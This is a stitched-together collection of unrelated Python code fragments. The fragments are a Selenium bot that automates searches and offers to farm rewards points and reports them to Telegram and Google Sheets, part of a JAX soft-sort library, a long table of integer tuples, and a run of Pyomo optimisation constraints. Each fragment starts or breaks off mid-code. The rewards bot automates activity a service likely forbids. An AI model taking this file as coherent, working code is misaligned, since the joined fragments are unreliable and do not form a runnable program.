punchcard_progress = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.XPATH, "//div[@class='punchcard-completion-row']"))).text
self.__sys_out(f'Overall punch card progress: {punchcard_progress}', 2)
return is_complete_punchcard or is_complete_activity
def __complete_edge_search(self, driver=None, close=False):
self.__sys_out("Starting Edge search", 1)
try:
if driver is None:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.edge_search = self.__search(
driver, Driver.WEB_DEVICE, is_edge=True
)
if self.completion.edge_search:
self.__sys_out("Successfully completed edge search", 1, True)
else:
self.__sys_out("Failed to complete edge search", 1, True)
except:
try:
driver.quit()
except AttributeError: # not yet initialized
pass
raise
if close:
driver.quit()
else:
return driver
def __complete_web_search(self, driver=None, close=False):
self.__sys_out("Starting web search", 1)
try:
if driver is None:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.web_search = self.__search(
driver, Driver.WEB_DEVICE
)
if self.completion.web_search:
self.__sys_out("Successfully completed web search", 1, True)
else:
self.__sys_out("Failed to complete web search", 1, True)
except:
try:
driver.quit()
except AttributeError: # not yet initialized
pass
raise
if close:
driver.quit()
else:
return driver
def __complete_mobile_search(self, driver=None, close=False):
self.__sys_out("Starting mobile search", 1)
try:
if driver is None:
driver = Driver.get_driver(
self.path, Driver.MOBILE_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.mobile_search = self.__search(
driver, Driver.MOBILE_DEVICE
)
if self.completion.mobile_search:
self.__sys_out("Successfully completed mobile search", 1, True)
else:
self.__sys_out("Failed to complete mobile search", 1, True)
except:
try:
driver.quit()
except AttributeError: # not yet initialized
pass
raise
if close:
driver.quit()
else:
return driver
def __complete_offers(self, driver=None):
self.__sys_out("Starting offers", 1)
try:
if not driver:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.offers = self.__offers(driver)
if self.completion.offers == -1 or not self.completion.offers:
self.__sys_out("Failed to complete offers", 1, True)
else:
self.__sys_out("Successfully completed offers", 1, True)
except:
try:
driver.quit()
except AttributeError:
pass
raise
return driver
def __complete_punchcard(self, driver=None):
self.__sys_out("Starting punch card", 1)
try:
if not driver:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.punchcard = self.__punchcard(driver)
if not self.completion.punchcard:
self.__sys_out("Failed to complete latest punch card activity", 1, True)
else:
self.__sys_out("Completed latest punch card activity OR entire punch card already completed", 1, True)
except:
try:
driver.quit()
except AttributeError:
pass
raise
return driver
def __print_stats(self, driver):
try:
self.__open_dashboard(driver)
#once pointsbreakdown link is clickable, page is loaded
WebDriverWait(driver, self.__WEB_DRIVER_WAIT_SHORT).until(
EC.element_to_be_clickable(
(
By.XPATH,
'//*[@id="rx-user-status-action"]/span/ng-transclude'
)
)
)
#sleep an additional 5 seconds to make sure stats are loaded
time.sleep(self.__WEB_DRIVER_WAIT_SHORT)
stats = driver.find_elements(By.XPATH,
'//mee-rewards-counter-animation//span'
)
#level 2
earned_index = 4
streak_index = 2
days_till_bonus_index = 3
avail_index = 0
#level 1
if len(stats) == 6:
earned_index += 1
streak_index += 1
days_till_bonus_index += 1
avail_index += 1
self.__sys_out("Summary", 1, flush=True)
self.__sys_out(
"Points earned: " +
stats[earned_index].text.replace(" ", ""), 2
)
self.__sys_out("Streak count: " + stats[streak_index].text, 2)
self.__sys_out(
stats[days_till_bonus_index].text, 2, end=True
) # streak details, ex. how many days remaining, bonus earned
self.__sys_out(
"Available points: " + stats[avail_index].text, 2
)
if self.telegram_messenger:
self.__sys_out(
"Sending Telegram Notification", 2
)
current_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
to_send = f'\n Summary for {self.email} at : {current_time} \n\n' \
f'Points earned today: {stats[earned_index].text.replace(" ", "")} \n' \
f'Streak count : {stats[streak_index].text} \n' \
f'{stats[days_till_bonus_index].text} \n' \
f'Available points: {stats[avail_index].text} \n'
resp = self.telegram_messenger.send_message(to_send)
if resp.status_code == 200:
self.__sys_out(
"Telegram notification sent", 3
)
else:
self.__sys_out(
f"Boo! Telegram notification NOT sent, response is: {resp}", 3
)
if self.googlespreadsheet_reporting:
self.__sys_out(
"Adding row to Google SpreadSheet", 2
)
current_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
user = f'{self.email}'
points_earned_today = f'{stats[earned_index].text.replace(" ", "")}'
streak_count = f'{stats[streak_index].text}'
days_till_bonus_count = f'{stats[days_till_bonus_index].text}'
available_points = int(f'{stats[avail_index].text.replace(".", "").replace(",", "")}')
resp = self.googlespreadsheet_reporting.add_row(current_time, user, points_earned_today, streak_count, days_till_bonus_count, available_points)
if int(f"{resp['updates']['updatedRows']}") >= 1:
self.__sys_out(
"Row added to Google SpreadSheet succesfully", 3
)
else:
self.__sys_out(
f"Boo! Row | |
# coding=utf-8
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Soft sort operators."""
import functools
from typing import Callable, Optional
import jax
import jax.numpy as jnp
import numpy as np
from ott.tools import transport
def transport_for_sort(
inputs: jnp.ndarray,
weights: jnp.ndarray,
target_weights: jnp.ndarray,
squashing_fun: Optional[Callable[[jnp.ndarray], jnp.ndarray]] = None,
epsilon: float = 1e-2,
**kwargs) -> jnp.ndarray:
r"""Solves reg. OT, from inputs to a weighted family of increasing values.
Args:
inputs: jnp.ndarray[num_points]. Must be one dimensional.
weights: jnp.ndarray[num_points]. Weight vector `a` for input values.
target_weights: jnp.ndarray[num_targets]: Weight vector of the target
measure. It may be of different size than `weights`.
squashing_fun: function taking an array to squash all its entries in [0,1].
sigmoid of whitened values by default. Can be set to be the identity by
passing ``squashing_fun = lambda x : x`` instead.
epsilon: the regularization parameter.
**kwargs: keyword arguments for `sinkhorn` and / or `PointCloud`.
Returns:
A jnp.ndarray<float> num_points x num_target transport matrix, from all
inputs onto the sorted target.
"""
shape = inputs.shape
if len(shape) > 2 or (len(shape) == 2 and shape[1] != 1):
raise ValueError(
'Shape ({shape}) not supported. The input should be one-dimensional.')
x = jnp.expand_dims(jnp.squeeze(inputs), axis=1)
if squashing_fun is None:
squashing_fun = lambda z: jax.nn.sigmoid(
(z - jnp.mean(z)) / (jnp.std(z) + 1e-10))
x = squashing_fun(x)
a = jnp.squeeze(weights)
b = jnp.squeeze(target_weights)
num_targets = b.shape[0]
y = jnp.linspace(0.0, 1.0, num_targets)[:, jnp.newaxis]
return transport.solve(x, y, a=a, b=b, epsilon=epsilon, **kwargs)
def apply_on_axis(op, inputs, axis, *args, **kwargs):
"""Applies a differentiable operator on a given axis of the input.
Args:
op: a differentiable operator (can be ranks, quantile, etc.)
inputs: jnp.ndarray<float> of any shape.
axis: the axis (int) or tuple of ints on which to apply the operator. If
several axes are passed the operator, those are merged as a single
dimension.
*args: other positional arguments to the operator.
**kwargs: other positional arguments to the operator.
Returns:
A jnp.ndarray holding the output of the differentiable operator on the given
axis.
"""
op_inner = functools.partial(op, **kwargs)
axis = (axis,) if isinstance(axis, int) else axis
num_points = np.prod(np.array(inputs.shape)[tuple([axis])])
permutation = np.arange(len(inputs.shape))
axis = tuple(permutation[a] for a in axis)
permutation = tuple(sorted(set(permutation) - set(axis)) + sorted(axis))
inputs = jnp.transpose(inputs, permutation)
batch_fn = jax.vmap(op_inner, in_axes=(0,) + (None,) * len(args))
result = batch_fn(jnp.reshape(inputs, (-1, num_points)), *args)
shrink = len(axis)
result = jnp.reshape(result, inputs.shape[:-shrink] + result.shape[-1:])
permutation = tuple(range(len(result.shape)))
rank = len(result.shape) - 1
axis = min(axis)
permutation = permutation[:axis] + (rank,) + permutation[axis:-1]
result = jnp.transpose(result, permutation)
return result
def _sort(inputs: jnp.ndarray, topk, num_targets, **kwargs) -> jnp.ndarray:
"""Applies the soft sort operator on a one dimensional array."""
num_points = inputs.shape[0]
a = jnp.ones((num_points,)) / num_points
if 0 < topk < num_points:
start_index = 1
b = jnp.concatenate([
jnp.array([(num_points - topk) / num_points]),
jnp.ones(topk, dtype=inputs.dtype) / num_points
])
else:
num_targets = num_points if num_targets is None else num_targets
start_index = 0
b = jnp.ones((num_targets,)) / num_targets
ot = transport_for_sort(inputs, a, b, **kwargs)
out = 1.0 / b * ot.apply(inputs, axis=0)
return out[start_index:]
def sort(inputs: jnp.ndarray,
axis: int = -1,
topk: int = -1,
num_targets: Optional[int] = None,
**kwargs) -> jnp.ndarray:
r"""Applies the soft sort operator on a given axis of the input.
Args:
inputs: jnp.ndarray<float> of any shape.
axis: the axis on which to apply the operator.
topk: if set to a positive value, the returned vector will only contain
the topk values. This also reduces the complexity of soft sorting.
num_targets: if topk is not specified, num_targets defines the number of
(composite) sorted values computed from the inputs (each value is a convex
combination of values recorded in the inputs, provided in increasing
order). If not specified, ``num_targets`` is set by default to be the size
of the slices of the input that are sorted, i.e. the number of composite
sorted values is equal to that of the inputs that are sorted.
**kwargs: keyword arguments passed on to lower level functions. Of interest
to the user are ``squashing_fun``, which will redistribute the values in
``inputs`` to lie in [0,1] (sigmoid of whitened values by default) to
solve the optimal transport problem; ``cost_fn``, used in ``PointCloud``,
that defines the ground cost function to transport from ``inputs`` to the
``num_targets`` target values (squared Euclidean distance by default, see
``pointcloud.py`` for more details); ``epsilon`` values as well as other
parameters to shape the ``sinkhorn`` algorithm.
Returns:
A jnp.ndarray of the same shape as the input with soft sorted values on the
given axis.
"""
return apply_on_axis(_sort, inputs, axis, topk, num_targets, **kwargs)
def _ranks(inputs: jnp.ndarray, num_targets, **kwargs) -> jnp.ndarray:
"""Applies the soft ranks operator on a one dimensional array."""
num_points = inputs.shape[0]
num_targets = num_points if num_targets is None else num_targets
a = jnp.ones((num_points,)) / num_points
b = jnp.ones((num_targets,)) / num_targets
ot = transport_for_sort(inputs, a, b, **kwargs)
out = 1.0 / a * ot.apply(jnp.arange(num_targets), axis=1)
return jnp.reshape(out, inputs.shape)
def ranks(inputs: jnp.ndarray,
axis: int = -1,
num_targets: Optional[int] = None,
**kwargs) -> jnp.ndarray:
r"""Applies the soft trank operator on input tensor.
Args:
inputs: a jnp.ndarray<float> of any shape.
axis: the axis on which to apply the soft ranks operator.
num_targets: num_targets defines the number of targets used to compute a
composite ranks for each value in ``inputs``: that soft rank will be a
convex combination of values in [0,...,``(num_targets-2)/num_targets``,1]
specified by the optimal transport between values in ``inputs`` towards
those values. If not specified, ``num_targets`` is set by default to be
the size of the slices of the input that are sorted.
**kwargs: keyword arguments passed on to lower level functions. Of interest
to the user are ``squashing_fun``, which will redistribute the values in
``inputs`` to lie in [0,1] (sigmoid of whitened values by default) to
solve the optimal transport problem; ``cost_fn``, used in ``PointCloud``,
that defines the ground cost function to transport from ``inputs`` to the
``num_targets`` target values (squared Euclidean distance by default, see
``pointcloud.py`` for more details); ``epsilon`` values as well as other
parameters to shape the ``sinkhorn`` algorithm.
Returns:
A jnp.ndarray<float> of the same shape as inputs, with the ranks.
"""
return apply_on_axis(_ranks, inputs, axis, num_targets, **kwargs)
def quantile(inputs: jnp.ndarray,
axis: int = -1,
level: float = 0.5,
weight: float = 0.05,
**kwargs) -> jnp.ndarray:
r"""Applies the soft quantile operator on the input tensor.
For instance:
x = jax.random.uniform(rng, (1000,))
q = quantile(x, 0.5, 0.01)
Then q will be computed as a mean over the 10 median points of x.
Therefore, there is a tradeoff between accuracy and gradient.
Args:
inputs: a jnp.ndarray<float> of any shape.
axis: the axis on which to apply the operator.
level: the value of the quantile level to be computed. 0.5 for median.
weight: the weight of the quantile in the transport problem.
**kwargs: keyword arguments passed on to lower level functions. Of interest
to the user are ``squashing_fun``, which will redistribute the values in
``inputs`` to lie in [0,1] (sigmoid of whitened values by default) to
solve the optimal transport problem; ``cost_fn``, used in ``PointCloud``,
that defines the ground cost function to transport from ``inputs`` to the
``num_targets`` target values (squared Euclidean distance by default, see
``pointcloud.py`` for more details); ``epsilon`` values as well as other
parameters to shape the ``sinkhorn`` algorithm.
Returns:
A jnp.ndarray, which has the same shape as the input, except on the give
axis on which the dimension is 1.
"""
# TODO(cuturi,oliviert) option to compute several quantiles at once, as in tf.
def _quantile(inputs: jnp.ndarray,
level: float,
weight: float,
**kwargs) -> jnp.ndarray:
num_points = inputs.shape[0]
a | |
-4): (1, 1),
(9, 28, 0, -3): (1, 1),
(9, 28, 0, -2): (1, 1),
(9, 28, 0, -1): (0, 1),
(9, 28, 0, 0): (-1, 1),
(9, 28, 0, 1): (-1, 1),
(9, 28, 0, 2): (-1, 0),
(9, 28, 0, 3): (-1, -1),
(9, 28, 0, 4): (-1, -1),
(9, 28, 0, 5): (-1, -1),
(9, 28, 1, -5): (0, 1),
(9, 28, 1, -4): (0, 1),
(9, 28, 1, -3): (0, 1),
(9, 28, 1, -2): (0, 1),
(9, 28, 1, -1): (0, 1),
(9, 28, 1, 0): (0, 1),
(9, 28, 1, 1): (0, 0),
(9, 28, 1, 2): (0, -1),
(9, 28, 1, 3): (0, 1),
(9, 28, 1, 4): (0, 1),
(9, 28, 1, 5): (0, 1),
(9, 28, 2, -5): (0, 1),
(9, 28, 2, -4): (0, 1),
(9, 28, 2, -3): (0, 1),
(9, 28, 2, -2): (0, 1),
(9, 28, 2, -1): (0, 1),
(9, 28, 2, 0): (0, 1),
(9, 28, 2, 1): (0, 0),
(9, 28, 2, 2): (-1, -1),
(9, 28, 2, 3): (0, 1),
(9, 28, 2, 4): (0, 1),
(9, 28, 2, 5): (0, 1),
(9, 28, 3, -5): (0, 1),
(9, 28, 3, -4): (0, 1),
(9, 28, 3, -3): (0, 1),
(9, 28, 3, -2): (0, 1),
(9, 28, 3, -1): (0, 1),
(9, 28, 3, 0): (0, 1),
(9, 28, 3, 1): (0, 0),
(9, 28, 3, 2): (-1, -1),
(9, 28, 3, 3): (0, 1),
(9, 28, 3, 4): (0, 1),
(9, 28, 3, 5): (0, 1),
(9, 28, 4, -5): (0, 1),
(9, 28, 4, -4): (0, 1),
(9, 28, 4, -3): (0, 1),
(9, 28, 4, -2): (0, 1),
(9, 28, 4, -1): (0, 1),
(9, 28, 4, 0): (0, 1),
(9, 28, 4, 1): (0, 0),
(9, 28, 4, 2): (-1, -1),
(9, 28, 4, 3): (0, 1),
(9, 28, 4, 4): (0, 1),
(9, 28, 4, 5): (0, 1),
(9, 28, 5, -5): (0, 1),
(9, 28, 5, -4): (0, 1),
(9, 28, 5, -3): (0, 1),
(9, 28, 5, -2): (0, 1),
(9, 28, 5, -1): (0, 1),
(9, 28, 5, 0): (0, 1),
(9, 28, 5, 1): (0, 0),
(9, 28, 5, 2): (-1, -1),
(9, 28, 5, 3): (0, 1),
(9, 28, 5, 4): (0, 1),
(9, 28, 5, 5): (0, 1),
(9, 29, -5, -5): (0, 1),
(9, 29, -5, -4): (0, 1),
(9, 29, -5, -3): (0, 1),
(9, 29, -5, -2): (0, 1),
(9, 29, -5, -1): (0, 1),
(9, 29, -5, 0): (0, 1),
(9, 29, -5, 1): (0, 1),
(9, 29, -5, 2): (0, 1),
(9, 29, -5, 3): (0, 0),
(9, 29, -5, 4): (-1, -1),
(9, 29, -5, 5): (0, 1),
(9, 29, -4, -5): (0, 1),
(9, 29, -4, -4): (0, 1),
(9, 29, -4, -3): (0, 1),
(9, 29, -4, -2): (0, 1),
(9, 29, -4, -1): (1, 1),
(9, 29, -4, 0): (1, 1),
(9, 29, -4, 1): (1, 1),
(9, 29, -4, 2): (0, 1),
(9, 29, -4, 3): (0, 0),
(9, 29, -4, 4): (-1, -1),
(9, 29, -4, 5): (0, 1),
(9, 29, -3, -5): (-1, 1),
(9, 29, -3, -4): (-1, 1),
(9, 29, -3, -3): (-1, 1),
(9, 29, -3, -2): (-1, 1),
(9, 29, -3, -1): (0, 1),
(9, 29, -3, 0): (0, 1),
(9, 29, -3, 1): (0, 1),
(9, 29, -3, 2): (-1, 1),
(9, 29, -3, 3): (-1, 0),
(9, 29, -3, 4): (-1, -1),
(9, 29, -3, 5): (-1, 1),
(9, 29, -2, -5): (0, 1),
(9, 29, -2, -4): (0, 1),
(9, 29, -2, -3): (0, 1),
(9, 29, -2, -2): (1, 1),
(9, 29, -2, -1): (-1, 1),
(9, 29, -2, 0): (-1, 1),
(9, 29, -2, 1): (-1, 1),
(9, 29, -2, 2): (-1, 0),
(9, 29, -2, 3): (-1, -1),
(9, 29, -2, 4): (-1, -1),
(9, 29, -2, 5): (-1, 1),
(9, 29, -1, -5): (1, 1),
(9, 29, -1, -4): (1, 1),
(9, 29, -1, -3): (1, 1),
(9, 29, -1, -2): (1, 1),
(9, 29, -1, -1): (0, 1),
(9, 29, -1, 0): (-1, 1),
(9, 29, -1, 1): (-1, 1),
(9, 29, -1, 2): (-1, 0),
(9, 29, -1, 3): (-1, -1),
(9, 29, -1, 4): (-1, -1),
(9, 29, -1, 5): (-1, 1),
(9, 29, 0, -5): (1, 1),
(9, 29, 0, -4): (1, 1),
(9, 29, 0, -3): (1, 1),
(9, 29, 0, -2): (1, 1),
(9, 29, 0, -1): (-1, 1),
(9, 29, 0, 0): (-1, 1),
(9, 29, 0, 1): (-1, 0),
(9, 29, 0, 2): (-1, -1),
(9, 29, 0, 3): (-1, -1),
(9, 29, 0, 4): (-1, -1),
(9, 29, 0, 5): (-1, 1),
(9, 29, 1, -5): (0, 1),
(9, 29, 1, -4): (0, 1),
(9, 29, 1, -3): (0, 1),
(9, 29, 1, -2): (0, 1),
(9, 29, 1, -1): (0, 1),
(9, 29, 1, 0): (0, 0),
(9, 29, 1, 1): (-1, -1),
(9, 29, 1, 2): (0, 1),
(9, 29, 1, 3): (0, 1),
(9, 29, 1, 4): (0, 1),
(9, 29, 1, 5): (0, 1),
(9, 29, 2, -5): (0, 1),
(9, 29, 2, -4): (0, 1),
(9, 29, 2, -3): (0, 1),
(9, 29, 2, -2): (0, 1),
(9, 29, 2, -1): (0, 1),
(9, 29, 2, 0): (0, 0),
(9, 29, 2, 1): (-1, -1),
(9, 29, 2, 2): (0, 1),
(9, 29, 2, 3): (0, 1),
(9, 29, 2, 4): (0, 1),
(9, 29, 2, 5): (0, 1),
(9, 29, 3, -5): (0, 1),
(9, 29, 3, -4): (0, 1),
(9, 29, 3, -3): (0, 1),
(9, 29, 3, -2): (0, 1),
(9, 29, 3, -1): (0, 1),
(9, 29, 3, 0): (0, 0),
(9, 29, 3, 1): (-1, -1),
(9, 29, 3, 2): (0, 1),
(9, 29, 3, 3): (0, 1),
(9, 29, 3, 4): (0, 1),
(9, 29, 3, 5): (0, 1),
(9, 29, 4, -5): (0, 1),
(9, 29, 4, -4): (0, 1),
(9, 29, 4, -3): (0, 1),
(9, 29, 4, -2): (0, 1),
(9, 29, 4, -1): (0, 1),
(9, 29, 4, 0): (0, 0),
(9, 29, 4, 1): (-1, -1),
(9, 29, 4, 2): (0, 1),
(9, 29, 4, 3): (0, 1),
(9, 29, 4, 4): (0, 1),
(9, 29, 4, 5): (0, 1),
(9, 29, 5, -5): (0, 1),
(9, 29, 5, -4): (0, 1),
(9, 29, 5, -3): (0, 1),
(9, 29, 5, -2): (0, 1),
(9, 29, 5, -1): (0, 1),
(9, 29, 5, 0): (0, 0),
(9, 29, 5, 1): (-1, -1),
(9, 29, 5, 2): (0, 1),
(9, 29, 5, 3): (0, 1),
(9, 29, 5, 4): (0, 1),
(9, 29, 5, 5): (0, 1),
(9, 30, -5, -5): (0, 1),
(9, 30, -5, -4): (0, 1),
(9, 30, -5, -3): (0, 1),
(9, 30, -5, -2): (0, 1),
(9, 30, -5, -1): (0, 1),
(9, 30, -5, 0): (0, 1),
(9, 30, -5, 1): (0, 1),
(9, 30, -5, 2): (0, 0),
(9, 30, -5, 3): (-1, -1),
(9, 30, -5, 4): (-1, -1),
(9, 30, -5, 5): (0, 1),
(9, 30, -4, -5): (0, 1),
(9, 30, -4, -4): (0, 1),
(9, 30, -4, -3): (0, 1),
(9, 30, -4, -2): (1, 1),
(9, 30, -4, -1): (1, 1),
(9, 30, -4, 0): (1, 1),
(9, 30, -4, 1): (0, 1),
(9, 30, -4, 2): (0, 0),
(9, 30, -4, 3): (-1, -1),
(9, 30, -4, 4): (-1, -1),
(9, 30, -4, 5): (0, 1),
(9, 30, -3, -5): (-1, 1),
(9, 30, -3, -4): (-1, 1),
(9, 30, -3, -3): (-1, 1),
(9, 30, -3, -2): (0, 1),
(9, 30, -3, -1): (0, 1),
(9, 30, -3, 0): (0, | |
m.x201 - 82.091893062253*m.x851 - 4.62594653112602*m.x856 - 0.173783959337771*m.x861
+ m.x1611 == 0)
m.c612 = Constraint(expr= - m.x202 - 82.091893062253*m.x852 - 4.62594653112602*m.x857 - 0.173783959337771*m.x862
+ m.x1612 == 0)
m.c613 = Constraint(expr= - m.x203 - 82.091893062253*m.x853 - 4.62594653112602*m.x858 - 0.173783959337771*m.x863
+ m.x1613 == 0)
m.c614 = Constraint(expr= - m.x204 - 82.091893062253*m.x854 - 4.62594653112602*m.x859 - 0.173783959337771*m.x864
+ m.x1614 == 0)
m.c615 = Constraint(expr= - m.x205 - 82.091893062253*m.x855 - 4.62594653112602*m.x860 - 0.173783959337771*m.x865
+ m.x1615 == 0)
m.c616 = Constraint(expr= - m.x206 - 364.2*m.x866 - 91.05*m.x871 - 15.175*m.x876 + m.x1616 == 0)
m.c617 = Constraint(expr= - m.x207 - 364.2*m.x867 - 91.05*m.x872 - 15.175*m.x877 + m.x1617 == 0)
m.c618 = Constraint(expr= - m.x208 - 364.2*m.x868 - 91.05*m.x873 - 15.175*m.x878 + m.x1618 == 0)
m.c619 = Constraint(expr= - m.x209 - 364.2*m.x869 - 91.05*m.x874 - 15.175*m.x879 + m.x1619 == 0)
m.c620 = Constraint(expr= - m.x210 - 364.2*m.x870 - 91.05*m.x875 - 15.175*m.x880 + m.x1620 == 0)
m.c621 = Constraint(expr= - m.x206 - 646.308106937747*m.x866 - 286.734053468873*m.x871 - 84.8062160406618*m.x876
+ m.x1621 == 0)
m.c622 = Constraint(expr= - m.x207 - 646.308106937747*m.x867 - 286.734053468873*m.x872 - 84.8062160406618*m.x877
+ m.x1622 == 0)
m.c623 = Constraint(expr= - m.x208 - 646.308106937747*m.x868 - 286.734053468873*m.x873 - 84.8062160406618*m.x878
+ m.x1623 == 0)
m.c624 = Constraint(expr= - m.x209 - 646.308106937747*m.x869 - 286.734053468873*m.x874 - 84.8062160406618*m.x879
+ m.x1624 == 0)
m.c625 = Constraint(expr= - m.x210 - 646.308106937747*m.x870 - 286.734053468873*m.x875 - 84.8062160406618*m.x880
+ m.x1625 == 0)
m.c626 = Constraint(expr= - m.x206 - 82.091893062253*m.x866 - 4.62594653112602*m.x871 - 0.173783959337771*m.x876
+ m.x1626 == 0)
m.c627 = Constraint(expr= - m.x207 - 82.091893062253*m.x867 - 4.62594653112602*m.x872 - 0.173783959337771*m.x877
+ m.x1627 == 0)
m.c628 = Constraint(expr= - m.x208 - 82.091893062253*m.x868 - 4.62594653112602*m.x873 - 0.173783959337771*m.x878
+ m.x1628 == 0)
m.c629 = Constraint(expr= - m.x209 - 82.091893062253*m.x869 - 4.62594653112602*m.x874 - 0.173783959337771*m.x879
+ m.x1629 == 0)
m.c630 = Constraint(expr= - m.x210 - 82.091893062253*m.x870 - 4.62594653112602*m.x875 - 0.173783959337771*m.x880
+ m.x1630 == 0)
m.c631 = Constraint(expr= - m.x211 - 364.2*m.x881 - 91.05*m.x886 - 15.175*m.x891 + m.x1631 == 0)
m.c632 = Constraint(expr= - m.x212 - 364.2*m.x882 - 91.05*m.x887 - 15.175*m.x892 + m.x1632 == 0)
m.c633 = Constraint(expr= - m.x213 - 364.2*m.x883 - 91.05*m.x888 - 15.175*m.x893 + m.x1633 == 0)
m.c634 = Constraint(expr= - m.x214 - 364.2*m.x884 - 91.05*m.x889 - 15.175*m.x894 + m.x1634 == 0)
m.c635 = Constraint(expr= - m.x215 - 364.2*m.x885 - 91.05*m.x890 - 15.175*m.x895 + m.x1635 == 0)
m.c636 = Constraint(expr= - m.x211 - 646.308106937747*m.x881 - 286.734053468873*m.x886 - 84.8062160406618*m.x891
+ m.x1636 == 0)
m.c637 = Constraint(expr= - m.x212 - 646.308106937747*m.x882 - 286.734053468873*m.x887 - 84.8062160406618*m.x892
+ m.x1637 == 0)
m.c638 = Constraint(expr= - m.x213 - 646.308106937747*m.x883 - 286.734053468873*m.x888 - 84.8062160406618*m.x893
+ m.x1638 == 0)
m.c639 = Constraint(expr= - m.x214 - 646.308106937747*m.x884 - 286.734053468873*m.x889 - 84.8062160406618*m.x894
+ m.x1639 == 0)
m.c640 = Constraint(expr= - m.x215 - 646.308106937747*m.x885 - 286.734053468873*m.x890 - 84.8062160406618*m.x895
+ m.x1640 == 0)
m.c641 = Constraint(expr= - m.x211 - 82.091893062253*m.x881 - 4.62594653112602*m.x886 - 0.173783959337771*m.x891
+ m.x1641 == 0)
m.c642 = Constraint(expr= - m.x212 - 82.091893062253*m.x882 - 4.62594653112602*m.x887 - 0.173783959337771*m.x892
+ m.x1642 == 0)
m.c643 = Constraint(expr= - m.x213 - 82.091893062253*m.x883 - 4.62594653112602*m.x888 - 0.173783959337771*m.x893
+ m.x1643 == 0)
m.c644 = Constraint(expr= - m.x214 - 82.091893062253*m.x884 - 4.62594653112602*m.x889 - 0.173783959337771*m.x894
+ m.x1644 == 0)
m.c645 = Constraint(expr= - m.x215 - 82.091893062253*m.x885 - 4.62594653112602*m.x890 - 0.173783959337771*m.x895
+ m.x1645 == 0)
m.c646 = Constraint(expr= - m.x216 - 364.2*m.x896 - 91.05*m.x901 - 15.175*m.x906 + m.x1646 == 0)
m.c647 = Constraint(expr= - m.x217 - 364.2*m.x897 - 91.05*m.x902 - 15.175*m.x907 + m.x1647 == 0)
m.c648 = Constraint(expr= - m.x218 - 364.2*m.x898 - 91.05*m.x903 - 15.175*m.x908 + m.x1648 == 0)
m.c649 = Constraint(expr= - m.x219 - 364.2*m.x899 - 91.05*m.x904 - 15.175*m.x909 + m.x1649 == 0)
m.c650 = Constraint(expr= - m.x220 - 364.2*m.x900 - 91.05*m.x905 - 15.175*m.x910 + m.x1650 == 0)
m.c651 = Constraint(expr= - m.x216 - 646.308106937747*m.x896 - 286.734053468873*m.x901 - 84.8062160406618*m.x906
+ m.x1651 == 0)
m.c652 = Constraint(expr= - m.x217 - 646.308106937747*m.x897 - 286.734053468873*m.x902 - 84.8062160406618*m.x907
+ m.x1652 == 0)
m.c653 = Constraint(expr= - m.x218 - 646.308106937747*m.x898 - 286.734053468873*m.x903 - 84.8062160406618*m.x908
+ m.x1653 == 0)
m.c654 = Constraint(expr= - m.x219 - 646.308106937747*m.x899 - 286.734053468873*m.x904 - 84.8062160406618*m.x909
+ m.x1654 == 0)
m.c655 = Constraint(expr= - m.x220 - 646.308106937747*m.x900 - 286.734053468873*m.x905 - 84.8062160406618*m.x910
+ m.x1655 == 0)
m.c656 = Constraint(expr= - m.x216 - 82.091893062253*m.x896 - 4.62594653112602*m.x901 - 0.173783959337771*m.x906
+ m.x1656 == 0)
m.c657 = Constraint(expr= - m.x217 - 82.091893062253*m.x897 - 4.62594653112602*m.x902 - 0.173783959337771*m.x907
+ m.x1657 == 0)
m.c658 = Constraint(expr= - m.x218 - 82.091893062253*m.x898 - 4.62594653112602*m.x903 - 0.173783959337771*m.x908
+ m.x1658 == 0)
m.c659 = Constraint(expr= - m.x219 - 82.091893062253*m.x899 - 4.62594653112602*m.x904 - 0.173783959337771*m.x909
+ m.x1659 == 0)
m.c660 = Constraint(expr= - m.x220 - 82.091893062253*m.x900 - 4.62594653112602*m.x905 - 0.173783959337771*m.x910
+ m.x1660 == 0)
m.c661 = Constraint(expr= - m.x221 - 364.2*m.x911 - 91.05*m.x916 - 15.175*m.x921 + m.x1661 == 0)
m.c662 = Constraint(expr= - m.x222 - 364.2*m.x912 - 91.05*m.x917 - 15.175*m.x922 + m.x1662 == 0)
m.c663 = Constraint(expr= - m.x223 - 364.2*m.x913 - 91.05*m.x918 - 15.175*m.x923 + m.x1663 == 0)
m.c664 = Constraint(expr= - m.x224 - 364.2*m.x914 - 91.05*m.x919 - 15.175*m.x924 + m.x1664 == 0)
m.c665 = Constraint(expr= - m.x225 - 364.2*m.x915 - 91.05*m.x920 - 15.175*m.x925 + m.x1665 == 0)
m.c666 = Constraint(expr= - m.x221 - 646.308106937747*m.x911 - 286.734053468873*m.x916 - 84.8062160406618*m.x921
+ m.x1666 == 0)
m.c667 = Constraint(expr= - m.x222 - 646.308106937747*m.x912 - 286.734053468873*m.x917 - 84.8062160406618*m.x922
+ m.x1667 == 0)
m.c668 = Constraint(expr= - m.x223 - 646.308106937747*m.x913 - 286.734053468873*m.x918 - 84.8062160406618*m.x923
+ m.x1668 == 0)
m.c669 = Constraint(expr= - m.x224 - 646.308106937747*m.x914 - 286.734053468873*m.x919 - 84.8062160406618*m.x924
+ m.x1669 == 0)
m.c670 = Constraint(expr= - m.x225 - 646.308106937747*m.x915 - 286.734053468873*m.x920 - 84.8062160406618*m.x925
+ m.x1670 == 0)
m.c671 = Constraint(expr= - m.x221 - 82.091893062253*m.x911 - 4.62594653112602*m.x916 - 0.173783959337771*m.x921
+ m.x1671 == 0)
m.c672 = Constraint(expr= - m.x222 - 82.091893062253*m.x912 - 4.62594653112602*m.x917 - 0.173783959337771*m.x922
